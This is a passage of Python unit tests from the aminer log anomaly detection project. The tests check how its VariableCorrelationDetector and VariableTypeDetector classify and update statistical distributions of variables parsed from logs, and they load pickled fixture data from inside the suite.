for i in range(70): stat_data = bytes(str((i % 10) * 1), 'utf-8') values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', stat_data, stat_data, children)), t, self.__class__.__name__) etd.receive_atom(log_atom) for i in range(30): stat_data = bytes(str((i % 10) * 2), 'utf-8') values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) old_w_rel_list = deepcopy(vcd.w_rel_list[0]) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertEqual({key: 10}, value) elif key >= 10.0: self.assertEqual({key/2: 3}, value) elif key % 2 == 0: self.assertTrue(value in ({key/2: 3, key: 7}, {key*2: 3, key: 7})) else: self.assertTrue(value in ({key: 7}, {key*2: 3, key: 7})) values = [] for i in range(80): stat_data = bytes(str((i % 10) * 1 + offset), 'utf-8') values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', stat_data, stat_data, children)), t, self.__class__.__name__) etd.receive_atom(log_atom) for i in range(20): stat_data = bytes(str((i % 10) * 2 + offset), 'utf-8') values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.log_atom = log_atom vcd.update_rules[0] = update_rules vcd.generate_rules[0] = generate_rules vcd.update_or_test_cor(0) return old_w_rel_list def test17init_and_update_timings(self): """This test checks if the init and update 
        intervals are calculated correctly."""
        description = 'test17VCD1'
        t = time()
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5,
                                          num_init=self.dataset_size, num_update=self.dataset_size)
        self.analysis_context.register_component(vcd, description)
        # NOTE(review): values is only appended to and never read in this test.
        values = []
        for i in range(self.dataset_size):
            stat_data = bytes(str((i % 10) * 0.1), 'utf-8')
            values.append(float(stat_data))
            children = [MatchElement(str(0), stat_data, stat_data, None)]
            log_atom = LogAtom(stat_data, ParserMatch(MatchElement(
                '/', str((i % 10) * 0.1).encode(), str((i % 10) * 0.1).encode(), children)), t, self.__class__.__name__)
            etd.receive_atom(log_atom)
            vcd.receive_atom(log_atom)
            # nothing may be learned before num_init atoms have been received.
            if i < self.dataset_size - 1:
                self.assertEqual(vcd.pos_var_cor, [])
                self.assertEqual(vcd.pos_var_val, [])
                self.assertEqual(vcd.w_rel_list, [])
                self.assertEqual(vcd.rel_list, [])
        # just check if some values were learned and save them to compare.
        self.assertNotEqual(vcd.pos_var_cor, [])
        self.assertNotEqual(vcd.pos_var_val, [])
        self.assertNotEqual(vcd.w_rel_list, [])
        self.assertNotEqual(vcd.rel_list, [])
        old_pos_var_cor = deepcopy(vcd.pos_var_cor)
        old_pos_var_val = deepcopy(vcd.pos_var_val)
        old_w_rel_list = deepcopy(vcd.w_rel_list)
        old_rel_list = deepcopy(vcd.rel_list)
        values = []
        for i in range(self.dataset_size):
            stat_data = bytes(str((i % 10) * 1), 'utf-8')
            values.append(float(stat_data))
            children = [MatchElement(str(0), stat_data, stat_data, None)]
            log_atom = LogAtom(stat_data, ParserMatch(MatchElement(
                '/', str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__)
            etd.receive_atom(log_atom)
            vcd.receive_atom(log_atom)
            # the learned state must not change before num_update further atoms have been received.
            if i < self.dataset_size - 1:
                self.assertEqual(vcd.pos_var_cor, old_pos_var_cor)
                self.assertEqual(vcd.pos_var_val, old_pos_var_val)
                self.assertEqual(vcd.w_rel_list, old_w_rel_list)
                self.assertEqual(vcd.rel_list, old_rel_list)
        # no new values are expected as num_steps_create_new_rules is -1 by default.
        self.assertEqual(vcd.pos_var_cor, old_pos_var_cor)
        self.assertEqual(vcd.pos_var_val, old_pos_var_val)
        self.assertNotEqual(vcd.w_rel_list, old_w_rel_list)
        self.assertNotEqual(vcd.rel_list, old_rel_list)
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/VariableTypeDetectorTest.py000066400000000000000000001475251437606560100311140ustar00rootroot00000000000000
from aminer.analysis.EventTypeDetector import EventTypeDetector
from aminer.analysis.VariableTypeDetector import VariableTypeDetector, convert_to_floats, consists_of_ints, consists_of_floats
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase
import time
import pickle  # skipcq: BAN-B403
import random


class VariableTypeDetectorTest(TestBase):
    """Unittests for the VariableTypeDetector."""

    # path of the single MatchElement used by the tests below.
    path = "path"

    def test1convert_to_floats(self):
        """This unittest tests possible inputs of the convert_to_floats function."""
        # use a list full of floats
        float_list = [11.123, 12.0, 13.55, 12.11]
        result = convert_to_floats(float_list)
        self.assertEqual(float_list, result, result)
        # use a list containing some floats and integers
        float_int_list = [11.123, 12, 13.55, 12.11, 120]
        result = convert_to_floats(float_int_list)
        self.assertEqual([11.123, 12.0, 13.55, 12.11, 120.0], result, result)
        # use a list of strings with float values; str and bytes are both accepted
        string_float_list = ['11.123', '12.0', '13.55', b'12.11']
        result = convert_to_floats(string_float_list)
        self.assertEqual(float_list, result, result)
        # use a list of strings with values being no floats; a falsy result is expected
        string_no_float_list = ['11.123', '10:24 AM', '13.55', b'12.11']
        result = convert_to_floats(string_no_float_list)
        self.assertFalse(result)

    def test2consists_of_ints(self):
        """This unittest tests possible inputs of the consists_of_ints function."""
        # use a list full of integers
        int_list = [11, 12, 27, 33, 190]
        self.assertTrue(consists_of_ints(int_list))
        # use a list containing
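        # integers and floats
        int_float_list = [11, 12, 27, 33.0, 190]
        self.assertTrue(consists_of_ints(int_float_list))
        # use a list containing integers and floats
        int_float_list = [11, 12, 27, 33.0, 190.2]
        self.assertFalse(consists_of_ints(int_float_list))
        # use a list with integers as strings
        string_int_list = ['11', '12', '27', '33', b'190']
        self.assertFalse(consists_of_ints(string_int_list))

    def test3detect_continuous_shape_fixed_data(self):
        """
        This unittest tests possible continuously distributed variables raising from the detect_continuous_shape method.
        It uses fixed data sets. Every distribution has generated 20*100 Datasets and var_ev = 0, var_var = 1.
        Every fixture file holds the sample list and the expected per-iteration results for the KS and the CM goodness-of-fit test.
        """
        # Number of execution of the tested function
        iterations = 20
        # Size of the initial datasample
        dataset_size = 100
        # Significance level
        significance_niveau = 0.05
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        # one detector per goodness-of-fit test; both are reused for every distribution below.
        vtd_ks = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=dataset_size, div_thres=0.5,
                                      test_gof_int=True, sim_thres=0.3, gof_alpha=significance_niveau, used_gof_test='KS')
        vtd_cm = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=dataset_size, div_thres=0.5,
                                      test_gof_int=True, sim_thres=0.3, gof_alpha=significance_niveau, used_gof_test='CM')
        # (fixture file, searched distribution, beta variant or None for distributions without variants)
        fixtures = [
            ('unit/data/vtd_data/uni_data_test3', 'uni', None),
            ('unit/data/vtd_data/nor_data_test3', 'nor', None),
            ('unit/data/vtd_data/beta1_data_test3', 'beta', 1),
            ('unit/data/vtd_data/beta2_data_test3', 'beta', 2),
            ('unit/data/vtd_data/beta3_data_test3', 'beta', 3),
            ('unit/data/vtd_data/beta4_data_test3', 'beta', 4),
            ('unit/data/vtd_data/beta5_data_test3', 'beta', 5),
        ]
        for data_file, distribution, beta_variant in fixtures:
            # load data. pickle is only used on fixtures shipped with the test suite, never on external input.
            with open(data_file, 'rb') as f:
                [data_list, result_shapes_ks, result_shapes_cm] = pickle.load(f)  # skipcq: BAN-B301
            result_list_ks = []  # List of the results of the single tests
            result_list_cm = []  # List of the results of the single tests
            for i in range(iterations):
                sample = data_list[i * dataset_size:(i + 1) * dataset_size]
                # Add if the searched distribution is present in the found distributions
                result_list_ks.append(self._searched_shape_found(vtd_ks.detect_continuous_shape(sample), distribution, beta_variant))
                result_list_cm.append(self._searched_shape_found(vtd_cm.detect_continuous_shape(sample), distribution, beta_variant))
            # Test if the result list is correct
            self.assertEqual(result_list_ks, result_shapes_ks, data_file)
            self.assertEqual(result_list_cm, result_shapes_cm, data_file)

    @staticmethod
    def _searched_shape_found(distribution_list, distribution, beta_variant=None):
        """
        Return 1 if the searched distribution is among the shapes found by detect_continuous_shape, else 0.

        @param distribution_list result of detect_continuous_shape; this test reads element 0 as the name of the best fitting distribution,
        element -1 as the list of alternative distributions and, for beta, element -2 as the beta variant.
        @param distribution name of the searched distribution ('uni', 'nor', 'beta').
        @param beta_variant number of the searched beta variant; None for distributions without variants.
        """
        if beta_variant is None:
            found = distribution_list[0] == distribution or distribution in [distr[0] for distr in distribution_list[-1]]
        else:
            found = (distribution_list[0] == distribution and distribution_list[-2] == beta_variant) or (
                distribution + str(beta_variant)) in [distr[0] + str(distr[-1]) for distr in distribution_list[-1]]
        return 1 if found else 0

    def test4detect_var_type(self):
        """This unittest tests possible scenarios of the detect_var_type method."""
        # Load list of an uniformal distributed sample which consists of integers
        with open('unit/data/vtd_data/uni_data_test4', 'rb') as f:
            uni_data_list_int = pickle.load(f)  # skipcq: BAN-B301
        num_init = 100
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test='KS')
        t = time.time()
        # test the 'static' path of detect_var_type
        stat_data = b'5.3.0-55-generic'
        log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__)
        # check what happens if less than numMinAppearance values are available
        for i in range(num_init):
            self.assertTrue(etd.receive_atom(log_atom))
        result = vtd.detect_var_type(0, 0)
        self.assertEqual(['stat', [stat_data.decode()], False], result)
        # reset etd and vtd for clear results.
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test='KS')
        # test ascending with float values
        for i in range(num_init):
            stat_data = bytes(str(i * 0.1), 'utf-8')
            log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__)
            self.assertTrue(etd.receive_atom(log_atom))
        result = vtd.detect_var_type(0, 0)
        self.assertEqual(['asc', 'float'], result)
        # reset etd and vtd for clear results.
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test='KS')
        # test ascending with integer values
        for i in range(num_init):
            stat_data = bytes(str(i), 'utf-8')
            log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__)
            self.assertTrue(etd.receive_atom(log_atom))
        result = vtd.detect_var_type(0, 0)
        self.assertEqual(['asc', 'int'], result)
        # reset etd and vtd for clear results.
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test='KS')
        # test descending with float values
        for i in range(num_init, 0, -1):
            stat_data = bytes(str(i * 0.1), 'utf-8')
            log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__)
            self.assertTrue(etd.receive_atom(log_atom))
        result = vtd.detect_var_type(0, 0)
        self.assertEqual(['desc', 'float'], result)
        # reset etd and vtd for clear results.
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test='KS')
        # test descending with integer values
        for i in range(num_init, 0, -1):
            stat_data = bytes(str(i), 'utf-8')
            log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__)
            self.assertTrue(etd.receive_atom(log_atom))
        result = vtd.detect_var_type(0, 0)
        self.assertEqual(['desc', 'int'], result)
        # reset etd and vtd for clear results.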
etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=0.3, test_gof_int=True, used_gof_test='KS') # test 'num_init' and 'div_thres' values = [] for i in range(num_init): stat_data = bytes(str(uni_data_list_int[i]), 'utf-8') values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) # this means that the uniformal distribution must be detected. self.assertTrue(result[0] == 'uni' or (isinstance(result[-1], list) and 'uni' in [distr[0] for distr in result[-1]]), result) # test 'divThres' option for the continuous distribution vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=1.0, test_gof_int=True, used_gof_test='KS') result = vtd.detect_var_type(0, 0) self.assertEqual(['unq', values], result) # test 'testInt' option for the continuous distribution vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=0.3, test_gof_int=False, used_gof_test='KS') result = vtd.detect_var_type(0, 0) self.assertEqual(['unq', values], result) # test 'simThres' option to result in 'others' vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=0.5, test_gof_int=False, sim_thres=0.5, used_gof_test='KS') values = [] for i in range(100): stat_data = bytes(str((i % 50) * 0.1), 'utf-8') values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) # at least (1 - 'simThresh') * 'numMinAppearance' and maximal 
'numMinAppearance' * 'divThres' - 1 unique values must exist. self.assertEqual(['others', 0], result) # test discrete result vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=0.5, test_gof_int=False, sim_thres=0.3, used_gof_test='KS') values = [] for i in range(num_init): stat_data = bytes(str((i % 50) * 0.1), 'utf-8') values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) values_set = list(set(values)) values_app = [0 for _ in range(len(values_set))] for value in values: values_app[values_set.index(value)] += 1 values_app = [x / len(values) for x in values_app] self.assertEqual(['d', values_set, values_app, len(values)], result) def test5consists_of_floats(self): """This unittest tests the consists_of_floats method.""" # test an empty list data_list = [] self.assertTrue(consists_of_floats(data_list)) # test a list of integers and floats data_list = [10, 11.12, 13, 177, 0.5, 0.] self.assertTrue(consists_of_floats(data_list)) # test a list containing a string data_list = [10, 11.12, 13, 177, 0.5, 0., 'dd'] self.assertFalse(consists_of_floats(data_list)) # test a list containing bytes data_list = [10, 11.12, 13, 177, 0.5, 0., b'x'] self.assertFalse(consists_of_floats(data_list)) def test6receive_atom(self): """ This unittest tests if atoms are sorted to the right distribution and if the update steps also work properly. Therefore the assumption that after 200 values the VTD with the default parameters can change to the right distribution. 
""" # load data with open('unit/data/vtd_data/nor_data_test6', 'rb') as f: nor_data_list = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta1_data_test6', 'rb') as f: beta1_data_list = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/uni_data_test6', 'rb') as f: uni_data_list = pickle.load(f) # skipcq: BAN-B301 nor_data_list = nor_data_list*10 beta1_data_list = beta1_data_list*10 vtd_arguments = [(50, 30), (75, 50), (100, 50), (100, 75), (100, 100)] for init, update in vtd_arguments: etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0) t = time.time() stat_data = b'True' log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # initialize data for i in range(init): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['stat', [stat_data.decode()], True], result, (init, update, result)) # static -> static for i in range(update): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['stat', [stat_data.decode()], True], result, (init, update, result)) # static -> uni for uni_data in uni_data_list[2*update:4*update]: log_atom = LogAtom(uni_data, ParserMatch(MatchElement(self.path, str(uni_data).encode(), str(uni_data), None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] pos_distr = vtd.alternative_distribution_types[0][0] self.assertTrue(result[0] == 'uni' or 'uni' in [distr[0] for distr in pos_distr], (init, update, result)) # uni -> others for i in range(update): stat_data = bytes(str((i % int(update / 5))), 'utf-8') log_atom = 
LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['others', 0], result, (init, update, result)) # others -> d for i in range(update): stat_data = bytes(str((i % int(update / 5))), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual('d', result[0], (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0, num_d_bt=30) # initialize with d for i in range(init): stat_data = bytes(str((i % int(update / 5))), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual('d', result[0], (init, update, result)) # discrete to others with new values for uni_data in [i / update for i in range(update)]: log_atom = LogAtom(uni_data, ParserMatch(MatchElement(self.path, str(uni_data).encode(), str(uni_data), None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['others', 0], result, (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, 
num_pause_others=0, num_d_bt=20) # initialize with d for i in range(init): stat_data = bytes(str((i % int(update / 5))), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual('d', result[0], (init, update, result)) # discrete to others without new values, low num_d_bt for i in range(update): stat_data = bytes(str((i % int(update / 20))), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['others', 0], result, (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0, num_d_bt=100) # initialize with d for i in range(init): stat_data = bytes(str((i % int(update / 5))), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual('d', result[0], (init, update, result)) # discrete to others without new values, high num_d_bt for i in range(update): stat_data = bytes(str((i % int(update / 20))), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertNotEqual(['others', 0], result, (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, 
[self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0) t = time.time() stat_data = b'True' log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # initialize data for i in range(init): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['stat', [stat_data.decode()], True], result, (init, update, result)) # static -> asc for i in range(2*update): stat_data = bytes(str(i * 0.1), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['asc', 'float'], result, (init, update, result)) # asc -> desc for i in range(2*update, 0, -1): stat_data = bytes(str(i * 0.1), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['desc', 'float'], result, (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0) t = time.time() stat_data = b'True' log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # initialize data for i in range(init): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['stat', 
[stat_data.decode()], True], result, (init, update, result)) # static -> nor for nor_data in nor_data_list[update:3*update]: log_atom = LogAtom(nor_data, ParserMatch(MatchElement(self.path, str(nor_data).encode(), str(nor_data), None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] pos_distr = vtd.alternative_distribution_types[0][0] self.assertTrue(result[0] == 'nor' or 'nor' in [distr[0] for distr in pos_distr], (init, update, result)) # nor -> beta1 for beta1_data in beta1_data_list[:2*update]: log_atom = LogAtom(beta1_data, ParserMatch(MatchElement(self.path, str(beta1_data).encode(), str(beta1_data), None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] pos_distr = vtd.alternative_distribution_types[0][0] self.assertTrue((result[0] == 'beta' and result[-1] == 1) or 'beta1' in [distr[0]+str(distr[-1]) for distr in pos_distr], (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0) t = time.time() stat_data = b'True' log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # initialize data for i in range(init): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['stat', [stat_data.decode()], True], result, (init, update, result)) # static -> unq vtd.test_gof_int = False unq_data_list = [bytes(str(i), 'utf-8') for i in range(2*update)] random.shuffle(unq_data_list) for unq_data in unq_data_list: log_atom = LogAtom(unq_data, ParserMatch(MatchElement(self.path, unq_data, unq_data, None)), t, self.__class__.__name__) 
self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual('unq', result[0], (init, update, result)) def test7update_continuous_VT(self): """ This unittest tests the s_gof_test method. It uses randomised datasets, which can be printed in the terminal. Every distribution has generated 30*300 Datasets and var_ev = 0, var_var = 1. """ # Number of execution of the tested function iterations = 20 # Size of the initial datasample dataset_size_ini = 100 # Size of the update datasample dataset_size_upd = 50 # Significance level significance_niveau = 0.05 # load data with open('unit/data/vtd_data/uni_data_test7', 'rb') as f: [uni_data_list_ini, uni_data_list_upd, uni_result_shapes_ks, uni_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/nor_data_test7', 'rb') as f: [nor_data_list_ini, nor_data_list_upd, nor_result_shapes_ks, nor_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta1_data_test7', 'rb') as f: [beta1_data_list_ini, beta1_data_list_upd, beta1_result_shapes_ks, beta1_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta2_data_test7', 'rb') as f: [beta2_data_list_ini, beta2_data_list_upd, beta2_result_shapes_ks, beta2_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta3_data_test7', 'rb') as f: [beta3_data_list_ini, beta3_data_list_upd, beta3_result_shapes_ks, beta3_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta4_data_test7', 'rb') as f: [beta4_data_list_ini, beta4_data_list_upd, beta4_result_shapes_ks, beta4_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta5_data_test7', 'rb') as f: [beta5_data_list_ini, beta5_data_list_upd, beta5_result_shapes_ks, beta5_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) 
vtd_ks = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=dataset_size_ini, num_update=dataset_size_upd, gof_alpha=significance_niveau, used_gof_test='KS') vtd_cm = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=dataset_size_ini, num_update=dataset_size_upd, gof_alpha=significance_niveau, used_gof_test='CM') result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(uni_data_list_ini[i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'uni': variable_type_ini = variable_type_ini[:-1] elif 'uni' in [distr[0] for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'uni': variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[uni_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(uni_data_list_ini[i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'uni': variable_type_ini = variable_type_ini[:-1] elif 'uni' in [distr[0] for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'uni': variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[uni_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == uni_result_shapes_ks) self.assertTrue(result_list_cm == uni_result_shapes_cm) result_list_ks = 
[] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(nor_data_list_ini[i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'nor': variable_type_ini = variable_type_ini[:-1] elif 'nor' in [distr[0] for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'nor': variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[nor_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(nor_data_list_ini[i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'nor': variable_type_ini = variable_type_ini[:-1] elif 'nor' in [distr[0] for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'nor': variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = 